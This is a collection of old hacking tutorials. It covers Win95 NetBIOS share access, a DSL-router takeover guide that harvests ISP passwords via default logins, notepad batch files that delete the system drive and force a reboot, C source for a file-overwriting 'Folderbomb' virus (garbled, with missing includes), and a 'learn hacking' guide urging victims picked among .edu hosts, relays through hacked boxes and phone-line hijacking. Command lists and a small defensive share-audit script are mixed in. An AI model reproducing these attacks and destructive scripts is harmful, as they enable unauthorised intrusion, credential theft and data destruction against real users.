First, the method of protecting yourself needs to be made perfectly clear. DON'T SHARE FILES!! I can't stress that enough. If you are a home user, and you are connecting a Win95 computer to the Internet via some dial-up method, disable sharing. If you must share, use a strong password...8 characters minimum, a mix of upper and lower case letters and numbers, change the password every now and again. If you need to transmit the password to someone, do so over the phone or by written letter.

To disable sharing, click on My Computer -> Control Panel -> Network -> File and Print Sharing. In the dialog box that appears, uncheck both boxes. It's that easy.

What Can They Do?

What can someone do? Well, lots of stuff, but it largely depends on what shares are available. If someone is able to share a printer from your machine, they can send you annoying letters and messages. This consumes time, your printer ink/toner, and your paper. If they are able to share a disk share, what they can do largely depends upon what's in that share. The share appears as another directory on the attacker's machine, so any programs they run will be consuming their own resources...memory, cpu cycles, etc. But if the attacker has read and write access to those disk shares, then you're in trouble. If you take work home, your files may be vulnerable. Initialization and configuration files can be searched for passwords. Files can be modified and deleted.
A particularly nasty thing to do is adding a line to your autoexec.bat file so that the next time your computer is booted, the hard drive is formatted without any prompting from the user. Bad ju-ju, indeed.

** The command-line approach **

Okay, now for the part that should probably be titled "How they do it". All that is needed is the IP address of the remote machine. Now open up a DOS window, and at the command prompt, type:

c:\>nbtstat -A [ip_addr]

If the remote machine is connected to the Internet and the ports used for sharing are not blocked, you should see something like:

NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
NAME           <00>  UNIQUE      Registered
DOMAIN         <00>  GROUP       Registered
NAME           <03>  UNIQUE      Registered
USERNAME       <03>  UNIQUE      Registered

MAC Address = 00-00-00-00-00-00

This machine name table shows the machine and domain names, a logged-on username, and the address of the Ethernet adapter (the information has been obfuscated for instructional purposes).

**Note: This machine, if unpatched and not protected with a firewall or packet-filter router, may be vulnerable to a range of denial of service attacks, which seem to be fairly popular, largely because they require no skill or knowledge to perpetrate.

The key piece of information that you are looking for is in the Type column. A machine that has sharing enabled will have a hex code of "<20>".

**Note: With the right tools, it is fairly simple for a sysadmin to write a batch file that combs a subnet or her entire network, looking for client machines with sharing enabled. This batch file can then be run at specific times...every day at 2:00 am, only on Friday evenings or weekends, etc.

If you find a machine with sharing enabled, the next thing to do is type the following command:

c:\>net view \\[ip_addr]

Now, your response may be varied. You may find that there are no shares on the list, or that there are several shares available.
Choose which share you would like to connect to, and type the command:

c:\>net use g: \\[ip_addr]\[share_name]

You will likely get a response that the command was completed successfully. If that is the case, type:

c:\>cd g:

or whichever device name you decided to use. You can now view what exists on that share using the dir commands, etc.

Now, you may be presented with a password prompt when you issue the above command. If that is the case, typical "hacker" (I shudder at that term) methods may be used.

** The GUI approach **

After issuing the nbtstat command, you can opt for the GUI approach to accessing the shares on that machine. To do so, make sure that you leave the DOS window open, or minimized...don't close it. Now, use Notepad to open this file:

c:\windows\lmhosts.sam

Read over the file, and then create another file in Notepad, called simply "Lmhosts", without an extension. The file should contain the IP address of the host, the NetBIOS name of the host (from the nbtstat command), and #PRE, separated by tabs. Once you have added this information, save it, and minimize the window. In the DOS command window, type:

c:\>nbtstat -R

This command reloads the cache from the Lmhosts file you just created.

Now, click on Start -> Find -> Computer, and type in the NetBIOS name of the computer...the same one you added to the lmhosts file. If your attempt to connect to the machine is successful, you should be presented with a window containing the available shares. You may be presented with a password prompt window, but again, typical "hacker" (again, that term grates on me like fingernails on a chalk board, but today, it seems that it's all folks understand) techniques may be used to break the password.

************************************************
Note from Carolyn Meinel: Want to try this stuff without winding up in jail or getting expelled from school? Get a friend to give you permission to try to break in. First, you will need his or her IP address.
Usually this will be different every time your friend logs on. Your friend can learn his or her IP address by going to the DOS prompt while online and giving the command "netstat -r". Something like this should show up:

C:\WINDOWS>netstat -r

Route Table

Active Routes:

  Network Address          Netmask  Gateway Address        Interface  Metric
          0.0.0.0          0.0.0.0   198.999.176.84   198.999.176.84       1
        127.0.0.0        255.0.0.0        127.0.0.1        127.0.0.1       1
    198.999.176.0    255.255.255.0   198.999.176.84   198.999.176.84       1
   198.999.176.84  255.255.255.255        127.0.0.1        127.0.0.1       1
  198.999.176.255  255.255.255.255   198.999.176.84   198.999.176.84       1
        224.0.0.0        224.0.0.0   198.999.176.84   198.999.176.84       1
  255.255.255.255  255.255.255.255   198.999.176.84          0.0.0.0       1

Your friend's IP address should be under "Gateway Address." Ignore the 127.0.0.1 as this will show up for everyone and simply means "localhost" or "my own computer." If in doubt, break the Internet connection and then get online again. The number that changes is the IP address of your friend's computer.
***************************************************

**************************************************
Evil Genius tip: Here is something really scary. In your shell account give the "netstat" command. If your ISP allows you to use it, you might be able to get the dynamically assigned IP addresses of people from all over the world -- everyone who is browsing a Web site hosted by your ISP, everyone using ftp, spammers you might catch red-handed in the act of forging email on your ISP, guys up at 2AM playing on multiuser dungeons, IRC users, in fact you will see everyone who is connected to your ISP!
****************************************************

***************************************************
YOU CAN GO TO JAIL WARNING: If you find a Windows 95 box on the Internet with file sharing enabled and no password protection, you can still get in big trouble for exploiting it.
It's just like finding a house whose owner forgot to lock the door -- you still are in trouble if someone catches you inside. Tell temptation to take a hike!
************************************************

Final Words

Please remember that this Guide is for instructional purposes only and is meant to educate the sysadmin and user alike. If someone uses this information to gain access to a system which they have no permission or business messing with, I (keydet) cannot be responsible for the outcome. If you are intending to try this information out, do so with the consent and permission of a friend. If there are questions, comments or any doubts then feel free to ask me here.

greetz,
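The guide's note that a sysadmin can comb her own network for machines with sharing enabled comes down to reading the name table for the "<20>" entry. The following is an added example, not part of the original guide: it parses nbtstat -A output that has already been captured from machines the admin is responsible for and flags the ones that register "<20>". The captured outputs, host addresses and function names are constructed for this example.

```python
import re

# Meaning of the name-table codes the guide mentions (well-known NetBIOS suffixes).
SUFFIXES = {
    ("00", "UNIQUE"): "Workstation service (machine name)",
    ("00", "GROUP"): "Domain or workgroup name",
    ("03", "UNIQUE"): "Messenger service (machine or logged-on user name)",
    ("20", "UNIQUE"): "File Server service (sharing enabled)",
}

ENTRY_RE = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)\s*$")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")

# Constructed captures, keyed by host (addresses from the documentation range 192.0.2.0/24).
SAMPLE_REPORTS = {
    "192.0.2.10": """
       NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WS-ACCT01      <00>  UNIQUE      Registered
    OFFICE         <00>  GROUP       Registered
    WS-ACCT01      <03>  UNIQUE      Registered
    WS-ACCT01      <20>  UNIQUE      Registered

    MAC Address = 00-00-00-00-00-00
""",
    "192.0.2.11": """
       NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WS-FRONT02     <00>  UNIQUE      Registered
    OFFICE         <00>  GROUP       Registered
    JSMITH         <03>  UNIQUE      Registered

    MAC Address = 00-00-00-00-00-00
""",
    # What comes back when the machine is off or the sharing ports are blocked.
    "192.0.2.12": "Host not found.\n",
}


def parse_name_table(output):
    """Turn one nbtstat -A output into {'entries': [...], 'mac': str or None}."""
    entries, mac = [], None
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            name, suffix, kind, status = m.groups()
            entries.append({
                "name": name,
                "suffix": suffix.upper(),
                "type": kind,
                "status": status,
                "meaning": SUFFIXES.get((suffix.upper(), kind), "other"),
            })
            continue
        m = MAC_RE.search(line)
        if m:
            mac = m.group(1)
    return {"entries": entries, "mac": mac}


def sharing_enabled(table):
    """True when the table carries a registered unique <20> entry."""
    return any(
        e["suffix"] == "20" and e["type"] == "UNIQUE" and e["status"].lower() == "registered"
        for e in table["entries"]
    )


def audit(reports):
    """Return (host, verdict, names registered with <20>) for every captured output."""
    rows = []
    for host in sorted(reports):
        table = parse_name_table(reports[host])
        if not table["entries"]:
            rows.append((host, "no-answer", []))   # no name table came back
            continue
        names = [e["name"] for e in table["entries"] if e["suffix"] == "20"]
        rows.append((host, "SHARING" if sharing_enabled(table) else "ok", names))
    return rows


if __name__ == "__main__":
    for host, verdict, names in audit(SAMPLE_REPORTS):
        print("%-12s %-10s %s" % (host, verdict, ", ".join(names)))
```

A host flagged SHARING is one where the guide's advice applies: disable File and Print Sharing, or put a strong password on the share.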

all DOS commands!!

There are some hidden dos commands which u can't recognise by typing help in cmd

Here they are with description
COMMANDS:--
ANSI.SYS
Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND
Causes MS-DOS to look in other directories when editing a file or running a command.
ARP
Displays, adds, and removes arp information from network devices.
ASSIGN
Assign a drive letter to an alternate letter.
ASSOC
View the file associations.
AT
Schedule a time to execute commands or programs.
ATMADM
Lists connections and addresses seen by Windows ATM call manager.
ATTRIB
Display and change file attributes.
BATCH
Recovery console command that executes a series of commands in a file.
BOOTCFG
Recovery console command that allows a user to view, modify, and rebuild the boot.ini.
BREAK
Enable / disable CTRL + C feature.
CACLS
View and modify file ACL's.
CALL
Calls a batch file from another batch file.
CD
Changes directories.
CHCP
Supplement the International keyboard and character set information.
CHDIR
Changes directories.
CHKDSK
Check the hard disk drive running FAT for errors.
CHKNTFS
Check the hard disk drive running NTFS for errors.
CHOICE
Specify a listing of multiple options within a batch file.
CLS
Clears the screen.
CMD
Opens the command interpreter.
COLOR
Easily change the foreground and background color of the MS-DOS window.
COMMAND
Opens the command interpreter.
COMP
Compares files.
COMPACT
Compresses and uncompress files.
CONTROL
Open Control Panel icons from the MS-DOS prompt.
CONVERT
Convert FAT to NTFS.
COPY
Copy one or more files to an alternate location.
CTTY
Change the computers input/output devices.
DATE
View or change the systems date.
DEBUG
Debug utility to create assembly programs to modify hardware settings.
DEFRAG
Re-arrange the hard disk drive to help with loading programs.
DEL
Deletes one or more files.
DELETE
Recovery console command that deletes a file.
DELTREE
Deletes one or more files and/or directories.
DIR
List the contents of one or more directories.
DISABLE
Recovery console command that disables Windows system services or drivers.
DISKCOMP
Compare a disk with another disk.
DISKCOPY
Copy the contents of one disk and place them on another disk.
DOSKEY
Command to view and execute commands that have been run in the past.
DOSSHELL
A GUI to help with early MS-DOS users.
DRIVPARM
Enables overwrite of original device drivers.
ECHO
Displays messages and enables and disables echo.
EDIT
View and edit files.
EDLIN
View and edit files.
EMM386
Load extended Memory Manager.
ENABLE
Recovery console command to enable a disabled service or driver.
ENDLOCAL
Stops the localization of the environment changes enabled by the setlocal command.
ERASE
Erase files from computer.
EXIT
Exit from the command interpreter.
EXPAND
Expand a Microsoft Windows file back to its original format.
EXTRACT
Extract files from the Microsoft Windows cabinets.
FASTHELP
Displays a listing of MS-DOS commands and information about them.
FC
Compare files.
FDISK
Utility used to create partitions on the hard disk drive.
FIND
Search for text within a file.
FINDSTR
Searches for a string of text within a file.
FIXBOOT
Writes a new boot sector.
FIXMBR
Writes a new boot record to a disk drive.
FOR
Boolean used in batch files.
FORMAT
Command to erase and prepare a disk drive.
FTP
Command to connect and operate on a FTP server.
FTYPE
Displays or modifies file types used in file extension associations.
GOTO
Moves a batch file to a specific label or location.
GRAFTABL
Show extended characters in graphics mode.
HELP
Display a listing of commands and brief explanation.
IF
Allows for batch files to perform conditional processing.
IFSHLP.SYS
32-bit file manager.
IPCONFIG
Network command to view network adapter settings and assigned values.
KEYB
Change layout of keyboard.
LABEL
Change the label of a disk drive.
LH
Load a device driver in to high memory.
LISTSVC
Recovery console command that displays the services and drivers.
LOADFIX
Load a program above the first 64k.
LOADHIGH
Load a device driver in to high memory.
LOCK
Lock the hard disk drive.
LOGON
Recovery console command to list installations and enable administrator login.
MAP
Displays the device name of a drive.
MD
Command to create a new directory.
MEM
Display memory on system.
MKDIR
Command to create a new directory.
MODE
Modify the port or display settings.
MORE
Display one page at a time.
MOVE
Move one or more files from one directory to another directory.
MSAV
Early Microsoft Virus scanner.
MSD
Diagnostics utility.
MSCDEX
Utility used to load and provide access to the CD-ROM.
NBTSTAT
Displays protocol statistics and current TCP/IP connections using NBT
NET
Update, fix, or view the network or network settings
NETSH
Configure dynamic and static network information from MS-DOS.
NETSTAT
Display the TCP/IP network protocol statistics and information.
NLSFUNC
Load country specific information.
NSLOOKUP
Look up an IP address of a domain or host on a network.
PATH
View and modify the computers path location.
PATHPING
View and locate locations of network latency.
PAUSE
Command used in batch files to stop the processing of a command.
PING
Test / send information to another network computer or network device.
POPD
Changes to the directory or network path stored by the pushd command.
POWER
Conserve power with computer portables.
PRINT
Prints data to a printer port.
PROMPT
View and change the MS-DOS prompt.
PUSHD
Stores a directory or network path in memory so it can be returned to at any time.
QBASIC
Open the QBasic.
RD
Removes an empty directory.
REN
Renames a file or directory.
RENAME
Renames a file or directory.
RMDIR
Removes an empty directory.
ROUTE
View and configure windows network route tables.
RUNAS
Enables a user to execute a program on another computer.
SCANDISK
Run the scandisk utility.
SCANREG
Scan registry and recover registry from errors.
SET
Change one variable or string to another.
SETLOCAL
Enables local environments to be changed without affecting anything else.
SETVER
Change MS-DOS version to trick older MS-DOS programs.
SHARE
Installs support for file sharing and locking capabilities.
SHIFT
Changes the position of replaceable parameters in a batch program.
SHUTDOWN
Shutdown the computer from the MS-DOS prompt.
SMARTDRV
Create a disk cache in conventional memory or extended memory.
SORT
Sorts the input and displays the output to the screen.
START
Start a separate window in Windows from the MS-DOS prompt.
SUBST
Substitute a folder on your computer for another drive letter.
SWITCHES
Remove add functions from MS-DOS.
SYS
Transfer system files to disk drive.
TELNET
Telnet to another computer / device from the prompt.
TIME
View or modify the system time.
TITLE
Change the title of their MS-DOS window.
TRACERT
Visually view a network packets route across a network.
TREE
View a visual tree of the hard disk drive.
TYPE
Display the contents of a file.
UNDELETE
Undelete a file that has been deleted.
UNFORMAT
Unformat a hard disk drive.
UNLOCK
Unlock a disk drive.
VER
Display the version information.
VERIFY
Enables or disables the feature to determine if files have been written properly.
VOL
Displays the volume information about the designated drive.
XCOPY
Copy multiple files, directories, and/or drives from one location to another.

hacking DSL router!!

This tutorial will explain to you how to hack someone's internet account thru his router.This hack is based on a secuirty exploit of the router's default password and the stupidity of the user.Explanation: when somebody buy's a xDSL/Cabel router, the router is set to manufactory defaults like IP range, user accounts, router table, and most important the security level. The last one we will exploit.Most routers will have a user friendly setup menu running on port 23 (telnet) and sometimes port 80 (http) or both.This is what we are looking for.
Step 1.
Get a multie IP range scanner like superscanner (superscanner is fast and easy to use, get it here).Get a xDSL/Cabel user IP range. This is a single user IP 212.129.169.196 so the ip range of this Internet provider is 212.129.xxx.xxx most likely it will be from 212.129.1.1 to 212.129.255.255 .To keep your scanning range not to big it's smart to scan from 212.129.1.1 to 212.129.1.255 it also depends of your bandwidth how fast the scan will be finished.The IP adres above is just a example any IP range from a xDSL/Cabel provider can be used for this hack.before you start scanning specify the TCP/IP ports. You know that we are looking for TCP port 23 (telnet) and TCP port 80 (http) so edit the list and select only port 23 and port 80.Now start scanning and wait for the results.When finished scanning look for a IP that has a open port 23 and 80. Write them down or remember them.
Step 2.
Way 1
This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and address (56.9 modem for example) when connection to the victim's router.Now get a telnet program. Windows has a standard telnet program just go to start, select run and type down "telnet" without the ", click or enter OK.Select "connect" than "Remote system" enter IP adres of the victim in the "host name" field press OK.wait for your computer to make a connection. This way only works when the router has a open telnet port service running
Way 2
This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and adres (56.9 modem for example) when connection to the victim's router.Open a Internet explorer windows enter the IP address of the victim after the http:// in the address bar.This way only works when the router has a open hyper text transfer protocol (http) service running.
Step 3
Entering the userfriendly setup menu. 9 out of 10 times the menu is protected by a loginname and password. When the user doesn't change any security value's the default password stay's usable.So the only thing you have to do is find out what type of router the victim uses. I use this tool: GFILanguard Network Security Scanner. (get it here) is good. When you find out the type of router that's been used get the wright loginname and password from this list (get it here. not every router is on the list)
Default router password list
Step 4
When you have a connection in telnet or internet expolorer you need to look for user accounts.PPP, PPtP, PPeP, PPoP, or such connection protocol. If this is not correct look for anything that maybe contains any info about the ISP account of the user.go to this option and open it. Most likely you will see a overview of user setup options.Now look for the username and password.In most case the username will be freely displayed so just write it down or what ever....The password is a different story. Allmost always the password is protected by ********* (stars) in the telnet way there is noway around it (goto another victim) but when you have a port 80 connection (http). Internet connection way open click right mouse key and select "View source" now look for the field where the star are at. most likely you can read it because in the source code the star are converted to normal ASCII text.If not get a "******** to text" convertor like snadboy's revelation V.2 (get it here) move the cursor over the ****** and....It's a miracle you can read the password.Now you have the username and password. There a million fun thing to do with that but more about that next time.check the tutorial page freqently.
Tips.
Beware on most routers only one person can be loget on simultaneous in the router setupmenu.Don't change anything in the router if you don't know what you are doing.

format your hardisk using notepad!!

go to notepad
@Echo off
Del C:\ *.*y
save it as Dell.bat

or worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


and save it as a .bat file

a sample c code for virus!!

/*this is a simple program to create a virus in c

it will create folder in a folder in a folder and so on run this on your own responsibility*/

#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

all run commands!!

RUN Commands

Useful RUN Commands - I

To Access - Run Command
Accessibility Controls - access.cpl
Add Hardware Wizard - hdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Administrative Tools - control admintools
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard - fsquirt
Calculator - calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)* - directx.cpl
Direct X Troubleshooter - dxdiag
Disk Cleanup Utility - cleanmgr
Disk Defragment - dfrg.msc
Disk Management - diskmgmt.msc
Disk Partition Manager - diskpart
Display Properties - control desktop
Display Properties - desk.cpl
Display Properties (w/Appearance Tab Preselected) - control color
Dr. Watson System Troubleshooting Utility - drwtsn32
Driver Verifier Utility - verifier
Event Viewer - eventvwr.msc
File Signature Verification Tool - sigverif
Findfast - findfast.cpl
Folders Properties - control folders
Fonts - control fonts
Fonts Folder - fonts
Free Cell Card Game - freecell
Game Controllers - joy.cpl
Group Policy Editor (XP Prof) - gpedit.msc
Hearts Card Game - mshearts

Useful Run Commands - II

Iexpress Wizard - iexpress
Indexing Service - ciadv.msc
Internet Properties - inetcpl.cpl
IP Configuration (Display Connection Configuration) - ipconfig /all
IP Configuration (Display DNS Cache Contents) - ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents) - ipconfig /flushdns
IP Configuration (Release All Connections) - ipconfig /release
IP Configuration (Renew All Connections) - ipconfig /renew
IP Configuration (Refreshes DHCP & Re - Registers DNS) - ipconfig /registerdns
IP Configuration (Display DHCP Class ID) - ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID) - ipconfig /setclassid
Java Control Panel (If Installed) - jpicpl32.cpl
Java Control Panel (If Installed) - javaws
Keyboard Properties - control keyboard
Local Security Settings - secpol.msc
Local Users and Groups - lusrmgr.msc
Logs You Out Of Windows - logoff
Microsoft Chat - winchat
Minesweeper Game - winmine
Mouse Properties - control mouse
Mouse Properties - main.cpl
Network Connections - control netconnections
Network Connections - ncpa.cpl
Network Setup Wizard - netsetup.cpl
Notepad - notepad
Nview Desktop Manager (If Installed) - nvtuicpl.cpl
Object Packager - packager
ODBC Data Source Administrator - odbccp32.cpl
On Screen Keyboard - osk
Opens AC3 Filter (If Installed) - ac3filter.cpl
Password Properties - password.cpl
Performance Monitor - perfmon.msc
Performance Monitor - perfmon
Phone and Modem Options - telephon.cpl
Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder - printers
Private Character Editor - eudcedit
Quicktime (If Installed) - QuickTime.cpl
Regional Settings - intl.cpl
Registry Editor - regedit
Registry Editor - regedit32
Remote Desktop - mstsc
Removable Storage - ntmsmgr.msc
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc

Useful RUN Commands - III

Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitare Card Game - spider
SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately) - sfc /scannow
System File Checker Utility (Scan Once At Next Boot) - sfc /scanonce
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
System File Checker Utility (Return to Default Setting) - sfc /revert
System File Checker Utility (Purge File Cache) - sfc /purgecache
System File Checker Utility (Set Cache Size to size x) - sfc /cachesize=x
System Properties - sysdm.cpl
Task Manager - taskmgr
Telnet Client - telnet
User Account Management - nusrmgr.cpl
Utility Manager - utilman
Windows Firewall - firewall.cpl
Windows Magnifier - magnify
Windows Management Infrastructure - wmimgmt.msc
Windows System Security Tool - syskey
Windows Update Launches - wupdmgr
Windows XP Tour Wizard - tourstart
Wordpad - write

learn hacking!!

How to learn to hack in easy steps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Introduction
~~~~~~~~~~~~


If you are a hacker, you read this, and find something that's not correct or you don't like,
i want to know. mail me.

I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and
i don't care at all as long as it's understandable.

When you finish reading it, please TELL ME how you like it!

COPYING: You're welcome to distribute this document to whoever the hell you want, post it
on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.
If you want to perform it, ask me for permission. thanks a lot!

DISCLAIMER: This document is intended for ludical or educational purposes. I don't want to
promote computer crime and I'm not responsible of your actions in any way.
If you want to hack a computer, do the decent thing and ask for permission first.



Let's start
~~~~~~~~~~~

If you read carefully all what i'm telling here, you are smart and you work hard on it,
you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
A hacker is someone who is able to discover unknown vulnerabilities in software and able to
write the proper codes to exploit them.

NOTE: If you've been unlucky, and before you found this document, you've read the
guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.
You won't understand some things from my tutorial until you unpoison your brain.


Some definitions
~~~~~~~~~~~~~~~~

I'm going to refer to every kind of computer as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
Michael Knight's car, The Matrix, etc.

The systems we're going to hack (with permission) are plenty of normal users, whose
don't have any remote idea about security, and the root. The root user is called
superuser and is used by the admin to administer the system.

I'm going to refer to the users of a system as lusers. Logically, I'll refer to
the admin as superluser.



Operating Systems
~~~~~~~~~~~~~~~~~

Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
or perhaps a mac (motorola) box running macOS.

You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
systems.
This is for two main reasons:

-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
so on. to hack one of them, you need a minimum knowledge of a UNIX system, and what's better
than running it at home?

-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
you're running some kind of it.

Let's see where to find the unix you're interested on.

The UNIX systems may be divided in two main groups:

- commercial UNIXes
- free opensource UNIXes

A commercial unix's price is not like windoze's price, and it usually can't run on your box,
so forget it.

The free opensource UNIXes can also be divided in:
- BSD
These are older and difficult to use. The most secure OS (openBSD) is in this group.
You don't want them unless you're planning to install a server on them.

- Linux
Easy to use, stable, secure, and optimized for your kind of box. that's what we need.

I strongly suggest you to get the SuSE distribution of Linux.
It's the best one as i think, and i added here some tips for SuSE, so all should be easier.

Visit http://www.suse.de/ and look for a local store or order it online.
(i know i said it the software was free, but not the CDs nor the manual nor the support.
It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)

If you own an intel box, then order the PC version.

If you own a mac box, then order the PowerPC version.

Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.

It's possible you'll have problems with your hardware during the installation. Read the manual, ask
for technical support or buy new hardware, just install it however you can.

This is really important! READ THE MANUAL, or even buy a UNIX book.
Books about TCP/IP and C programming are also useful.

If you don't, you won't understand some things i'll explain later. And, of course, you'll
never become a hacker if you don't read a lot of that 'literature'.



the Internet
~~~~~~~~~~~~

Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
You want to hack internet boxes! So lets connect to the internet.

Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
You're a Linux user, and you gotta open your way to the Internet.

You gotta make your Linux box to connect to the net,
so go and set up your modem (using YaST2 in SuSE).

Common problems:

If your box doesn't detect any modems, that probably means that you have no modem installed
:-D (not a joke!).

Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
specifically designed to work ONLY on windoze. Don't blame linux, this happens because the
winmodem lacks a critical chip that makes it work. It works on windoze cause the vendor
driver emulates that missing chip. And that vendor driver is only available for windoze.


ISA and external modems are more likely to be real modems, but not all of them are.
If you want to make sure whether a modem is a winmodem or not, visit http://start.at/modem.

Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)

NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the
internet with aol. You can't hack with aol. i don't like aol. aol sucks.
Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,
leave aol and get a real ISP. Then you'll be forgiven.


Don't get busted
~~~~~~~~~~~~~~~~


Let's suppose you haven't skipped everything above and your Linux box is now connected to the net.

It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.

- Don't hack
this is the most effective stealth technique. not even the FBI can bust you. :-)
If you choose this option, stop reading now, cause the rest is worthless and futile.

- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
your own website or email address, find your ISP, your phone number, your home...
and you get busted!!

- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
NEVER tell others you've hacked a box.

- NEVER hack directly from your box (your_box --> victim's box).
Always use a third box in the middle (your_box --> lame_box --> victim's box).

Where lame_box is a previously hacked box or...a shell account box!
A shell account is a service where you get control of a box WITHOUT hacking it.
There are a few places where shell accounts are given for free. One of them is nether.net.

- Don't hack dangerous boxes until you're a real hacker.
Which boxes are dangerous:
Military boxes
Government boxes
Important and powerful companies' boxes
Security companies' boxes
Which boxes are NOT dangerous:
Educational boxes (any .edu domain)
Little companies' boxes
Japanese boxes

- Always connect to the internet through a free and anonymous ISP
(did i tell you that AOL is NOT an ISP?)

- Use phreaking techniques to redirect calls and use others' lines for your ISP call.
Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.


TCP ports and scanning
~~~~~~~~~~~~~~~~~~~~~~

Have you got your stealth linux box connected to the internet (not aol)?
Have you read the manual as i told you?


Then we shall start with the damn real thing.

First of all, you should know some things about the internet. It's based on the TCP/IP protocol
(and others).

It works like this: every box has 65k connection PORTS. some of them are opened and waiting for
your data to be sent.

So you can open a connection and send data to any of these ports. Those ports are associated with
a service:

Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
on the box, opens its port and offers its damn service.

here are some common ports and their usual services (there are a lot more):

Port number   Common service   Example daemon (d stands for daemon)
21            FTP              FTPd
23            Telnet           telnetd
25            SMTP             sendmail (yes!)
80            HTTP             apache
110           POP3             qpop


Example:
when you visit the website http://www.host.com/luser/index.html, your browser does this:
-it connects to the TCP port 80
-it sends the string: "GET /luser/index.html HTTP/1.1" plus two newlines (like pressing Enter twice)
(it really sends a lot of things more, but that is the essential)
-the host sends the html file

The cool thing of daemons is they have really serious security bugs.

That's why we want to know what daemons are running there, so...

We need to know what ports are opened in the box we want to hack.

How could we get that information?

We gotta use a scanner. A scanner is a program that tries to
connect to every port on the box and tells which of them are opened.

The best scanner i can think of is nmap, created by Fyodor.
You can get nmap from my site in tarball or rpm format.

Let's install nmap from an .rpm package.

bash-2.03$ rpm -i nmap-2.53-1.i386.rpm

then we run it:

bash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3


Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds


Nmap has told us which ports are opened on target.edu and thus, what services it's offering.

I know, i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.

So let's see what's on those ports.

On your linux console, type:

bash-2.03$ telnet target.edu 21
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu FTP server (SunOS 5.6) ready.
quit
221 Goodbye.
Connection closed by foreign host.

You see?
They speak out some valuable information:
-their operating system is SunOS 5.6
-their FTP daemon is the standard provided by the OS.

bash-2.03$ telnet target.edu 25
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0400 (EDT)
quit
221 2.0.0 target.edu closing connection
Connection closed by foreign host.

They like to tell us everything:
-their SMTP daemon is sendmail
-its version is 8.11.0/8.9.3

Experiment with other ports to discover other daemons.

